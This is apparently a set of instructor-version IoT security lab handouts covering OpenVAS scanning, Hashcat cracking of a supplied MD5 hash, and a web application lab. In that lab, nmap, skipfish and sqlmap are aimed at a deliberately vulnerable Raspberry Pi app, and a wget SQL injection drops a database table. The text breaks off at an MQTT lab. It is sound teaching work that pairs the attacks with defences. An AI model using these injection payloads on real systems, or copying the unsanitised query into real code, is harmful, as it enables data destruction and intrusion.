[*] You might need to refresh your browser once it opens.
[*]
[*] Web UI (Greenbone Security Assistant): https://127.0.0.1:9392
<some output omitted.>
g. In a terminal, enter the command more lab_support_files/openvas_info to view the content in the file
openvas-info for the username and password info to access OpenVAS in the web browser.
root@kali:~# more lab_support_files/openvas_info
User: admin
Pass: b0b22778-f1d5-459f-8320-4c47bad49942
Greenbone Web Interface:

https://127.0.0.1:9392
or
https://localhost:9392
h. After you have logged into OpenVAS, notice that the Dashboard provides you with Information regarding
the tasks, CVEs, hosts topology, and NVTs at a glance.
How many total CVEs are loaded into OpenVAS? _______________________________ 107824
How many total NVTs are loaded into OpenVAS? _______________________________ 45368
You can also click the different parts of the graphs to review the CVE or NVT details.
Now you are ready to start a vulnerability scan.
Part 2: Configuring a Vulnerability Scan
Step 1: Create the target.

In this step, you will configure Metasploitable VM as the target of your vulnerability scan.
a. In the menu at the top of the OpenVAS page, click Configuration -> Targets.
b. Click the white star in the blue box icon in the upper left-hand corner below the Dashboard menu.
c. When the New Target dialog box appears, enter the following information:
Name: Metasploitable VM
Hosts Manual: 203.0.113.5
Alive Test: Consider Alive.
d. Click Create. This process discovers targets that can be scanned in an OpenVAS task.
Step 2: Create a task.

In this step, you will configure a task to perform a vulnerability scan on the Metasploitable target.
a. Click Scans -> Tasks.
b. You will see a welcome page if this is the first visit to the Tasks page.
c. Click the white star in the blue box icon in the upper left-hand corner below the Dashboard menu. Select
New Task.
d. Name it Metasploitable. Verify Metasploitable VM is selected in the Scan Targets field. Leave the other
settings as is. Click Create to create a new task.
e. The new Metasploitable task is listed in the Tasks list. Click the Start button under the Actions menu
associated with the new Metasploitable task.
f. The status for the Metasploitable task will change to Requested.
g. Ensure that the web page will be refreshed automatically by changing the dropdown menu in the green
banner at the top of the page. It is currently set to No auto-refresh. Choose the desired refresh rate in the
dropdown menu.
Part 3: Reviewing Results

The entire scan of the Metasploitable VM will take about 40 minutes to complete. While the scan proceeds,
you can review reports for tasks that have been previously run.
a. Click Scans > Reports to review previously completed scans. Select a report and click it.
b. Locate the Filter field in the upper right of the results page. Click the blue wrench icon next to the Filter
field. OpenVAS can return many results. Filtering helps make scan results easier to read. This box allows
you to specify how many results you want to see, the vulnerability severity, and the number of results per
page. In addition columns can be sorted by clicking the column heading.
c. Review the list of vulnerabilities. They are rated by severity as Log, Low, Medium, and High. Explore
information about the discovered vulnerabilities for the different levels of severity. To start, locate a
vulnerability at the Log level of severity. Find one that makes sense to you and answer the questions
below. Repeat the process for the other levels of severity.
Severity: Log
What is the vulnerability and its impact?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. Example: TCP timestamps allows a user to determine the uptime of a computer.
What is the provided solution?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary. The TCP timestamps can be disabled.
Linux: add the line 'net.ipv4.tcp_timestamps = 0' to /etc/sysctl.conf. Execute 'sysctl -p' to apply the settings at
runtime.
Windows (excluding Server 2008 and Vista): execute 'netsh int tcp set global timestamps=disabled'
Severity: Low
What is the IP address and port number on the host? _________________________ Answers will vary.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
Severity: Medium
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.

_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
Severity: High
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers will vary.
Part 4: The Metasploitable Scan Results

In this part of the lab, you will return to the Metasploitable scan task and review the results.
a. Go to the Scans menu at the top of OpenVAS page and select Tasks.
b. Verify that the status of the Metasploitable task is Done. If it is not done, continue investigating the
OpenVAS tool and vulnerabilities until the scan has completed.
c. Click the Done button in the Status column of the tasks table for the Metasploitable task that you created.
This will display the report for the Metasploitable scan task.
How many vulnerabilities did OpenVAS find?
____________________________________________________________________________________
____________________________________________________________________________________
Answers may vary. The result should be approximately 260.
d. OpenVAS filters the results of a scan to vulnerabilities that have a QoD of 70% or higher. QoD is a
measure of the reliability of the scan result.
Click the Severity column header in the report to sort the results based on Severity.
e. Locate the OS End of Life Detection vulnerability. Investigate this vulnerability by clicking it and
exploring the explanation. What is this vulnerability and why is it a security vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
The OS running on Metasploitable is Ubuntu 8.04. This OS went end of life in May of 2013. This means
that security patches for the OS are not being created and distributed. This means that vulnerabilities for
this version that have been discovered since it went EOL could be exploited by hackers.
f. Investigate the vulnerability called phpinfo() output accessible. Open the Metasploitable phpinfo page in
your Kali browser. What kind of information contained on that page could be used by hackers?
____________________________________________________________________________________
____________________________________________________________________________________
A large amount of information about PHP is displayed on this page including PHP and module versions,
configuration information, internal IP addresses, etc. This is information that shouldn't be available to
users on the open web.
g. Investigate the vulnerability called /doc directory browsable. Open the /doc directory in your browser.
How could a hacker use this access to attack a system?
____________________________________________________________________________________
____________________________________________________________________________________
They could find out what software and software versions are running on the server.
Lab - Challenge Passwords with Kali Tools (Instructor Version)
Objectives
In this lab, you will explore tools that are available in the Kali VM to challenge passwords.
Part 1: Using Hashcat to Challenge Passwords
Part 2: Investigating Other Password Challenging Tools on Kali Linux
There are numerous Kali tools used to challenge passwords. It is very likely you have already seen and/or
used John the Ripper (john). John is a very powerful tool, but there are other tools that might be more
appropriate to use depending on the situation. It is very important to be aware of as many tools as possible so
you can select the most appropriate tool for the task at hand.
Hashcat is a very powerful password challenging tool that offers different features and has other advantages
in comparison to John the Ripper that you might find helpful to know how to use. Hashcat is an offline
password cracking tool that is claimed to be the world’s fastest CPU-based password recovery tool. It offers
various attack modes including dictionary, brute force, and combination attack. For the purposes of this lab,
we will use the combination attack based on the available information. We will be using a combination attack
to recover the password for a serious golf fan.
Required Resources
• PC with IoTSec Kali VM installed
• Internet connection
Part 1: Using Hashcat to Challenge Passwords
Step 1: Set up the environment and open a terminal window.

a. Start the IoT Security lab topology with Kali VM. Log into Kali VM with the username root and password
toor.
b. Open a terminal on the Kali VM.
c. Create a directory called passwordlab:
root@kali:~# mkdir passwordlab
d. Move into this directory:
root@kali:~# cd passwordlab
Step 2: Create the necessary dictionary files and MD5 hash file.
A MD5 hash value has been recovered for a user, and it is your job to crack this value. Rather than using a
brute force method that could take a long time, you will be using known information to crack this value much
quicker. The user is a golf fan and has specifically talked about Tiger Woods. In addition, it was discovered
from one of his social media public profiles that he graduated in 2002.
Lab - Challenge Passwords with Kali Tools
It is very typical for users to create passwords using words from their special interests or hobbies. When their
special interests are known, wordlists can be very helpful in recovering passwords or cracking hashes. There
are numerous sites out that provide wordlists for a wide variety of interests. For example:
https://packetstormsecurity.com/Crackers/wordlists/
This site provides a golfers.gz file that contains a list of golf names/words that can be used for a wordlist. It is
also known that users will usually take a name and make the password more complicated by either repeating
the name or word and/or adding numbers or special characters to it.
The following MD5 hash value was provided to you by a known golf fan, and it is your job to crack it:
22bb33653af9cc8f21d71fa0e55751b4
MD5 hash values are hexadecimal characters. Hexadecimal characters are alphanumeric from a to f and
numeric values from 0 through 9.
For the purposes of this lab, and time constraint issues, we will create our own dictionaries and use just a few
words per dictionary.
a. Create a dictionary file using multiple combinations of “tiger woods”:
root@kali:~/passwordlab# echo “tiger woods” > dict1.txt
root@kali:~/passwordlab# echo “tiger” >> dict1.txt
root@kali:~/passwordlab# echo “woods” >> dict1.txt
root@kali:~/passwordlab# echo “golf” >> dict1.txt
root@kali:~/passwordlab# more dict1.txt
b. The second dictionary file we will create will be the file that Hashcat will run the various combinations
with. It is very common for users to combine numbers with their passwords in order to make them longer
and minimum length requirements.
root@kali:~/passwordlab# echo “0” > dict2.txt
root@kali:~/passwordlab# echo “1” >> dict2.txt
root@kali:~/passwordlab# more dict2.txt
c. Save the md5 hash value into a text file called hash.txt:
root@kali:~/passwordlab# echo "22bb33653af9cc8f21d71fa0e55751b4" > hash.txt
d. If there are any typos with the hash when entering it, the lab will not work.
What command did you use to view the content in the file hash.txt? _____________________________
more hash.txt
Step 3: Crack a known MD5 hash value using Hashcat.

a. Use the man pages for hashcat to answer the following questions:
root@kali:~/passwordlab# man hashcat
What command should be used for an MD5 hash? ___________________________________________
hashcat -m 0
What command should be used for the attack mode of combination? _____________________________
Lab - Challenge Passwords with Kali Tools
hashcat -a 1
b. The --force option below is required because you are running this on a virtual image.
root@kali:~/passwordlab# hashcat –m 0 –a 1 –-force hash.txt dict1.txt
dict2.txt
Note: If you want to run this again with the same hash value, use the --potfile-disable option:
root@kali:~/passwordlab# hashcat –m 0 –a 1 –-force hash.txt dict1.txt
dict2.txt --potfile-disable
c. Review the output from this command and answer the following questions:
What was the recovered password from the MD5 hash? _______________________________________
tiger02
What was the status? __________________________________________________________________
Cracked
How long did it take? ___________________________________________________________________
3 seconds
d. To view the saved passwords from the hash.txt file use the following command:
root@kali:~/passwordlab# hashcat –-show hash.txt
Part 2: Investigating Other Password Challenging Tools on Kali Linux

In the previous part, you have learned to use a very powerful password cracking tool. There are a wide variety
of other tools that could be useful in addition to John the Ripper (john) and Hashcat.
Perform a web search to research the answers to the following questions.
1. In the previous part, you were provided a hash value to crack. You were told that it was an MD5 hash value
and when you entered the command hashcat, you used the value of -m 0 to indicate that it was an MD5
value. What if you did not know whether it was an MD5 or SHA1 value?
What tool can be used to determine what type of hash a particular hash value is?
_______________________________________________________________________________________
_______________________________________________________________________________________
The command hash-identifier can be used to determine hash type.
2. One of the commands that can identify the hash type is hash-identifier. Enter the command at the prompt:
root@kali:~# hash-identifier
When prompted, enter the MD5 hash value from the previous part: 22bb33653af9cc8f21d71fa0e55751b4
What was the possible hash value that was identified through the hash-identifier tool? ______________ MD5
3. What Kali Linux password cracking tool can be used to crack Windows passwords using rainbow tables?
_______________________________________________________________________________________
Ophcrack
4. What Kali Linux password cracking tool can be used to retrieve the syskey and extract Windows password
hashes from Windows?
_______________________________________________________________________________________
samdump2
Lab - Web Application Vulnerability (Instructor Version)
Topology
Required Resources
Objectives
In this lab, you will discover vulnerabilities in a simple Python web application using tools available in the
IoTSec Kali VM. You will exploit the vulnerabilities much as a hacker would. Finally, you will learn how to
address the vulnerabilities.
Part 1: Set up a Simple IoT Monitoring Application
Part 2: Conduct a Reconnaissance Attack
Part 3: Exploit a Vulnerable Web Application
Part 4: Add Application Protection
Background/Scenario
Many IoT systems include web applications that are used to monitor and control IoT devices. These
applications are also used to view data submitted by IoT devices, often through an analytical dashboard.
Many of these applications are accessed across the open Internet. Users authenticate to the application in
order to make of use of it. Commercial home IoT devices use web applications to provide users with an easy
way to monitor sensors in their homes and to control actuators such as thermostats, electrical outlets, and
alarms.
Lab - Web Application Vulnerability
Web application vulnerabilities involve system flaws or weakness in a web application. These vulnerabilities
can be due to form inputs that have not been validated or sanitized, misconfigured web servers, and
application design flaws. Attackers can exploit these weaknesses to compromise the security of the
application. The attacks can use tools such as Nmap and skipfish, to scan for weaknesses. Nmap is a
network exploration tool that can provide information on open ports and operating systems. skipfish is a web
application security scanner. A skipfish scan provides an interactive sitemap by using recursive crawl and
dictionary-based probes.
In this lab, you will exploit a misconfiguration in a simple Python application by using the sqlmap SQL injection
tool that is available in the IoTSec Kali VM. You will discover web application weakness and address them by
implementing a Python script that will sanitize application form input.
Part 1: Set up a Simple IoT Monitoring Application

a. Set up the IoT Security lab topology with the Kali VM and Raspberry Pi connected physically via an
Ethernet cable.
b. Log into the Kali VM and start the DHCP server.
c. Open a web browser in the Kali VM or your host PC and navigate to the IP address for your Raspberry Pi.
Step 2: Verify firewall status.

In this step, you will verify local connectivity to the Raspberry Pi via the local network.
a. Determine the IP address of your Raspberry Pi and SSH into the Raspberry Pi via a terminal in Kali VM
as a user with elevated privileges.
b. In the Kali terminal, verify that the uncomplicated firewall application (UFW) on the Raspberry Pi is not
running.
pi@myPi:~ $ sudo ufw status
Status: inactive
If the firewall status is active, enter the command sudo ufw disable to disable it.
pi@myPi:~ $ sudo ufw disable
Step 3: Run the application and show existing sensor data.

The simple web application was created using Python and a MySQL database. To start the application, make
sure that MySQL is running and the databases are created. Start the MySQL service by running the following
command.
pi@myPi:~ $ sudo systemctl start mysql
a. Navigate to the directory /home/pi/notebooks/Course Materials/4. IoT Security/scripts and review the
contents of the directory.
To make it easier to follow the instructions in this lab, the PL-App terminal prompt will be shortened
throughout this lab. To shorten the prompts in the current terminal, enter PROMPT_DIRTRIM=<number>
at the prompt, where number is the number of directory levels you want to see in the prompt. Use the
command pwd to display the full name of the current directory as needed.
pi@myPi:~ $ PROMPT_DIRTRIM=1
pi@myPi:~ $ cd notebooks/Course\ Materials/4.\ IoTSec/scripts/
pi@myPi:~ /.../scripts$ ls
app.py init_mysql.sql (output omitted)
b. Create the application database and tables using the script provided. Please note that during the probing
of the web application the database tables and data might become corrupt. It might be required to re-run
the script to restore the database.
pi@myPi:~ /.../scripts$ sudo mysql < init_mysql.sql
c. The application can then be started from the command line using the following command:
pi@myPi:~ /.../scripts$ python3 app.py
* Running on http://0.0.0.0:8080/ (Press CTRL+C to quit)
* Restarting with stat
Note: Keep this terminal open. The script must be running in order that the lab operate correctly. In
addition, do not attempt to rerun the script from another terminal. Always use the same terminal to run the
script.
d. Test the application from the Kali VM by opening a new web browser and connecting to the web page at
the IP address of the Raspberry Pi with port 8080. The example IP address for this lab is 203.0.113.12.
This IP address will be used throughout the lab.
Step 4: Add and update sensor data.

This application simulates an IoT web app that displays temperature data from a group of sensors. To add or
update the sensor data, the application provides a simple REST API that can be accessed directly from the
broswer. IoT sensors or gateways would send data over the web to a real application using a similar API.
a. Manually add temperature data. In a new web browser tab, visit the following webpage by using the IP
address for your Raspberry Pi at port 8080 to add a new sensor:
http://203.0.113.12:8080/add/<SENSOR_NAME>?temperature=<VALUE>
where you replace the <SENSOR_NAME> and the <VALUE> parameters, like in the following example.
http://203.0.113.12:8080/add/Kitchen?temperature=40
If your post is successul, you will receive a reply of OK in the web browser. You will also see messages in
the terminal where the Python script, app.py, was started. Leave the terminal open to observe the
messages as you progress through the lab.
Make several posts using different sensor names with different teperature values.
b. To verify that the new data is in the SQL table, navigate to the IP address for your Raspberry Pi at port
8080. Note the number under the No. column. This is the ID used for each post of sensor data. You may
need to refresh your browser window to see newly posted data.
c. Similarly, you can use the update API call to alter the temperature value of the sensor by referring to the
ID number in the data table:
http://203.0.113.12:8080/update/<ID>?temperature=30
where <ID> is replaced with the ID number from the dashboard. In this example, <ID> is 1. Refresh your
browser to see the updated results.
Part 2: Conduct a Reconnaissance Attack

In this part, you will use the Kali Linux VM to run a reconnaissance attack against the vulnerable web
application. The assumption is that an attacker has no knowledge of the running services on the web
application server or the API. This will simulate how an attacker might discover an actual vulnerability in a
server.
Step 1: Discover the open services on the Raspberry Pi.

One of the first steps in any attack is to understand the running services and ports on the local network.
a. In the Kali VM (not in the PL-App terminal that is open in the browser), open a new terminal. Issue the
following command in the terminal to discover the network services that are available on the Raspberry
Pi. Please note that the simple web application should still be running. This might take up to 5 minutes
depending on your local network.
root@kali:~# nmap 203.0.113.0/24 -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-25 13:21 EEST
All 65535 scanned ports on 203.0.113.11 are filtered
MAC Address: 00:E1:00:00:5B:0B (Unknown)

Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: B8:27:EB:CC:1C:9F (Raspberry Pi Foundation)

All 65535 scanned ports on 203.0.113.1 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 107.99 seconds

b. As seen above, the Raspberry Pi runs an SSH service on port 22 and an HTTP application on ports 80
and 8080. SSH will have been configured to run during an earlier lab. The attacker can now access the
application from the browser and observe the provided dashboard.
Investigate the running services on port 8080 using the command nmap -A -T4 203.0.113.12 -p8080.
This scan reveals details about the software running on the server.
root@kali:~# nmap -A -T4 203.0.113.12 -p8080
PORT STATE SERVICE VERSION

8080/tcp open http Werkzeug httpd 0.12.2 (Python 3.5.3)
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: Werkzeug/0.12.2 Python/3.5.3
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: B8:27:EB:CC:1C:9F (Raspberry Pi Foundation)
Warning: OSScan results may be unreliable because we could not find at least
1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
< output omitted >

What is the name and version of the HTTP daemon running on the Pi?
____________________________________________________________________________________
Werkzeug httpd 0.12.2
Do research on the web to answer the following questions. What vulnerability was recently discovered in
this web server software? Which company was compromised by an exploit of this vulnerability?
____________________________________________________________________________________
____________________________________________________________________________________
It was possible to inject code to open the Python debug console. Users were able to steal data from
there. The company was Patreon.
Step 2: Use Skipfish to discover hidden application pages.

In this step, you will discover hidden application pages on the target device. The application dashboard does
not show a method of inputting data on the page, so we need to see if there are any other available
webpages that might accept input for our SQL injection. For this, we use the skipfish application provided in
the Kali VM.
a. Run the following command to discover additional existing webpages. We are using the existing
dictionary, minimal.wl, which is installed by default with the skipfish. Press any key to start the process
and observe the statistics for the scan as it runs. The scan may take seven to ten minutes.
Consult the Kali Tools page for Skipfish to learn about the options used here.
root@kali:~# skipfish -O -L -Y -S /usr/share/skipfish/dictionaries/minimal.wl
-o vulnerable_app_results http://203.0.113.12:8080
Output similar to that below can be observed in the SSH session that is running Python as skipfish runs.
< output omitted >
203.0.113.1 - - [25/May/2018 10:32:26] "GET /1001 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /00 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /zip/ HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /zip HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /00 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /1001 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /11 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /1991 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /2002 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /2013 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /22 HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /Program$%20Files HTTP/1.1" 404 -
203.0.113.1 - - [25/May/2018 10:32:26] "GET /_mem_bin HTTP/1.1" 404 –
< output omitted >
Note that many additional webpages have been discovered. The output in the SSH session will show all
the pages that have been scanned in the Raspberry Pi. When the application is finished, a local directory
vulnerable_app_results will be created.
b. In a web browser on the Kali VM, navigate to file:///root/vulnerable_app_results/index.html. Expand

the crawl results to see the issues discovered by skipfish. Click show trace + to see the probe sent by
skipfish and the response from the Raspberry Pi webserver.
Part 3: Exploit a Vulnerable Web Application

In this part of the lab, we will use sqlmap to walk through the process of attacking the web application using
SQL injection. To learn more about sqlmap, search for the sqlmap users' guide on github. In addition, we will
attack the database as a hacker could.
Step 1: Discover application details.

a. First, previous sqlmap tests might have saved data in your local VM, so before starting the attack delete
any old results. Open a terminal and use the command ls -a to list the hidden files in the current directory.
root@kail:~# ls -a
. .ICEauthority .sqlmap
.. lab_support_files .ssh
.bash_history .lesshst Templates
< output omitted >
b. If the .sqlmap directory is present, use the command rm -rfi /root/.sqlmap/ to remove the directory and
content within the directory. If there are subdirectories, answer yes to descend and remove all the
subdirectories. You may need to respond to 9 or 10 prompts.
root@kali:~# rm -rfi /root/.sqlmap/
rm: descend into directory '/root/.sqlmap/'? yes
< output omitted >
rm: remove directory '/root/.sqlmap/'? yes
c. To discover the type and name of the database used by the web application, run the following command
and answer the prompts as shown below. This could take a few minutes. You can also observe the
messages on the SSH session.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --dbs
--threads=10 --current-db
< output omitted >
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads
specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL'
extending provided level (1) and risk (1) values? [Y/n] n
< output omitted >
GET parameter 'temperature' is vulnerable. Do you want to keep testing the
others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 93 HTTP(s)
requests:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:45:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:45:36] [INFO] fetching current database
< some output omitted >
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
[13:45:58] [INFO] adjusting time delay to 1 second due to good response times
vulnSensors
current database: 'vulnSensors'
[13:46:39] [INFO] fetching database names
[13:46:39] [INFO] fetching number of databases
[13:46:39] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
2
[13:46:42] [WARNING] (case) time-based comparison requires larger statistical
model, please wait.............................. (done)
information_schema
[13:47:46] [INFO] retrieved: vulnSensors
available databases [2]:

[*] information_schema
[*] vulnSensors
< output omitted >
d. The database type has been discovered as MySQL and the name as vulnSensors. We can also search
for the existing tables in that database. Respond to the prompt as shown below.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --
dbms=mysql -D vulnSensors --tables
< output omitted >
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: temperature (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: temperature=26' AND SLEEP(5) AND 'Dmqa'='Dmqa
---
[13:51:58] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n] y
< output omitted >
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:53:54] [INFO] fetching tables for database: 'vulnSensors'
[13:53:54] [INFO] fetching number of tables for database 'vulnSensors'
< output omitted >
[1 table]
+---------+
| sensors |
+---------+
< output omitted >
While sqlmap is running, you can view the queries it sends in the PL-App terminal. After a browser refresh,
you can also see that multiple sensor entries have been added.
So far, sqlmap has allowed us to discover that the database system is MySQL, the database name is
vulnSensors, and the table used for storing data is sensors.
Step 2: Attack the discovered table.

As a last step of the attack, we are going to build an SQL injection query using wget. It will exploit
vulnerabilities in the web application to delete the table from the database. The query can be sent to the web
application from a browser, but also from the Kali command line with the following command. A hacker could
do this and destroy important data.
Note: There is a space between the second hyphen (-) and the end quote (") at the end of the command.
root@kali:~# wget
"http://203.0.113.12:8080/add/1?temperature=1%27);drop%20table%20sensors;-- "
This will delete the “sensors” table and make the web application unusable. Refresh the web browser to
verify that the sensors table is no longer available. At this point, the web application has become unusable.
No sensors will be able to post data to the application and users will not be able to monitor the IoT system. A
hacker has successfully exploited a vulnerability in the web application using an SQL injection attack.
Part 4: Add Application Protection

Before you continue with the following section, the application needs to be restored to its original state.
Reinitialize the web application and the python process.
a. In the Kali terminal that is running the app.py script, press Ctrl-C to terminate the script.
b. Issue the following commands to reinitialize the web application and start the Python process.
pi@myPi:~/.../scripts $ sudo mysql < init_mysql.sql
pi@myPi:~/.../scripts $ python3 app.py
c. Refresh the web browser tab for the web application to verify that the application has become available
again.
Step 1: Block the brute-force attack.

Both skipfish and sqlmap use multiple queries to identify application vulnerabilities. The firewall application
provides a mechanism to limit such attacks.
a. Open a new web terminal in the PL-App.
b. Before you enable the ufw firewall, we must make sure that access to the SSH service and the web
application is still allowed. Issue the following commands to allow access and start the firewall.
(pl-app) root@myPi:/home/pi/notebooks# ufw allow ssh
(pl-app) root@myPi:/home/pi/notebooks # ufw allow 8080/tcp
(pl-app) root@myPi:/home/pi/notebooks # ufw allow 80/tcp
(pl-app) root@myPi:/home/pi/notebooks # ufw enable
Firewall is active and enabled on system startup
c. The firewall application, ufw, has a simple mechanism that limits the number of requests from a single IP
address to a specific service. Issue the following command.
(pl-app) root@myPi:/home/pi/notebooks # ufw limit 8080/tcp
d. Use the command ufw status to verify the firewall status.
(pl-app) root@myPi:/home/pi/notebooks# ufw status
Status: active
To Action From
-- ------ ----
8080/tcp LIMIT Anywhere
8080/tcp (v6) LIMIT Anywhere (v6)
e. To view the log messages in real time when you perform the SQL injection, use the command tail -f
filename in a new SSH session into Raspberry Pi from Kali VM. Press Ctrl-C to stop the display when
finished.
pi@myPi:~ $ tail -f /var/log/kern.log
f. Issue the following command to perform an SQL injection again from the Kali VM terminal. You may need
to run it more than once to see the UFW log messages in the SSH session running tail.
root@kali:~# sqlmap -u http://203.0.113.12:8080/add/test?temperature=26 --
dbms=mysql -D vulnSensors --tables
g. After the SQL injection, you will see log messages issued by ufw.
<output omitted>
May 25 11:22:51 locahost kernel: [16954.665180] [UFW LIMIT BLOCK] IN=eth0 OUT=
MAC=b8:27:eb:cc:1c:9f:00:0c:29:9c:a3:c5:08:00:45:00:00:3c:d7:a6:40:00:40:06:da:ee
SRC=203.0.113.1 DST=203.0.113.12 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=55206 DF
PROTO=TCP SPT=56186 DPT=8080 WINDOW=29200 RES=0x00 SYN URGP=0
h. Exit sqlmap with Ctrl-Z if necessary. Run the skipfish command again with a different output folder name.
You should see UFW log messages in the PL-App terminal that show that skipfish was blocked.
root@kali:~# skipfish -O -L -Y -S /usr/share/skipfish/dictionaries/minimal.wl
-o vulnerable_app_results1 http://203.0.113.12:8080
i. It will take some time for skipfish to run. After the skipfish scan is complete, in a web browser on the Kali
VM, navigate to file:///root/<folder name>/index.html. In this example, it is
file:///root/vulnerable_app_results1/index.html. Compare these results with the report from the

previous skipfish session.
Step 2: Sanitize application input.

The last step for securing the python web application is to sanitize the input that is sent to the MySQL service.
a. In a new PL-App terminal window, navigate to /home/pi/notebooks/Course Materials/4.
IoTSec/scripts.
b. Verify that the Python script is still running in the SSH session on Kali VM. If not, restart the Python script
in an SSH session on Kali VM.
pi@myPi:~/.../scripts# python3 app.py
c. Edit the app.py file using with the command nano -l app.py. Nano may indicate that the app.py script is
already being edited by root. If so, enter "y" to continue. Note: The file is owned by root. Make sure you
have root privilege to edit the file.
d. Locate line 67 in the app.py script. Comment this line by typing the "#" symbol in front of the line. Go to
line 68. Delete the comment character from the beginning of the line. Do not change the indentation of the
line.
#query="insert into sensors(name,temperature) values ('" + sensor_name +
"','" + sensorTempStr + "');"
query="insert into sensors(name,temperature) values ('" +
db.escape_string(sensor_name).decode("UTF-8") + "','" +
db.escape_string(sensorTempStr).decode("UTF-8") + "');"
e. Press Ctrl-X to save the file and exit nano. Nano will prompt you if you want to save. Enter "y" to save the
file and press enter to accept the filename as app.py.
f. Run the drop table attack again.
root@kali:~# wget
"http://203.0.113.12:8080/add/1?temperature=1%27);drop%20table%20sensors;-- "
g. Refresh the web browser associated with your web application. What happened to the sensors table after
the drop table attack?
____________________________________________________________________________________
The table is still displaying.
Part 5: Clean Up
In this part of the lab you will return the Raspberry Pi to its default configuration.
Step 1: Remove the UFW rules that were created in this lab.
You can delete the rules by issuing the ufw reset command. This will deactivate ufw and remove all rules.
(pl-app) root@myPi:/home/pi/notebooks# ufw reset
Resetting all rules to installed defaults. Proceed with operation (y|n)? y
Backing up 'before6.rules' to '/etc/ufw/before6.rules.20181220_152657'
Backing up 'user.rules' to '/etc/ufw/user.rules.20181220_152657'
Backing up 'before.rules' to '/etc/ufw/before.rules.20181220_152657'
Backing up 'after.rules' to '/etc/ufw/after.rules.20181220_152657'
Backing up 'user6.rules' to '/etc/ufw/user6.rules.20181220_152657'
Backing up 'after6.rules' to '/etc/ufw/after6.rules.20181220_152657'
(pl-app) root@myPi:/home/pi/notebooks# ufw status

Status: inactive
Step 2: Return app.py to its original version.

a. Edit the app.py script in nano as was done above. Remove the comment character from line 67 and add it
to line 68.
query="insert into sensors(name,temperature) values ('" + sensor_name + "','"
+ sensorTempStr + "');"
#query="insert into sensors(name,temperature) values ('" +
db.escape_string(sensor_name).decode("UTF-8") + "','" +
db.escape_string(sensorTempStr).decode("UTF-8") + "');"
b. Save the file and exit nano.
c. Navigate to the SSH session running python and press Ctrl+C to stop python. Or enter the command
pkill python at the PL-App web terminal to terminate python.
Step 3: Delete files and folders

In the Kali VM, delete the hidden .mysql and vulnerable_app_results folders.
root@kali:~# rm -r vulnerable_app_results* .sqlmap/
Lab - Hacking MQTT (Instructor Version)
Topology
Required Resources
 3 Raspberry Pi 3 devices, Model B or later
 Network connectivity between PC and Raspberry Pi Devices
 A Network Switch
Objectives
Part 1: Setting up a Publishing/Subscriber MQTT Infrastructure
Part 2: Sniffing Data using Kali
Part 3: Adding Username/Password Authentication
Part 4: Adding TLS protection
Background/Scenario
Message queuing telemetry transport (MQTT) is an extremely simple and lightweight publish/subscribe
messaging protocol. It is designed for IoT devices and uses minimal bandwidth and device resources. MQTT
is an ideal protocol for machine-to-machine (M2M) communications. MQTT uses the reserved TCP/IP port
